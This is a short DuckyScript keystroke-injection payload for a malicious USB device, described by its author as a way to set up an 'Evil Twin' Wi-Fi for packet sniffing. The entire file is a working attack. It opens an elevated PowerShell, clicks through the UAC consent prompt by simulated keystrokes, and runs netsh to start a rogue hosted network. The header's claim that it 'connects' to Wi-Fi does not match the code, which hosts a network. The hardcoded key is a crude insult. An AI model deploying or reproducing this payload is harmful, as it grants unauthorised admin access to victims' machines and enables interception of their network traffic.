REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Connect to a Wifi (example Evil Twin) to sniff packets or what you wanna do.
REM Version: 1.0
REM Category: Execution
DELAY 750
WINDOWS d
DELAY 1500
WINDOWS r
DELAY 1500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 750
LEFTARROW
ENTER
DELAY 1200
ALT y
DELAY 1200
GUI UP
DELAY 1200
STRING netsh wlan set hostednetwork ssid=Sussy_HACK  key=gayisaac;netsh wlan start hostednetwork; exit
ENTER
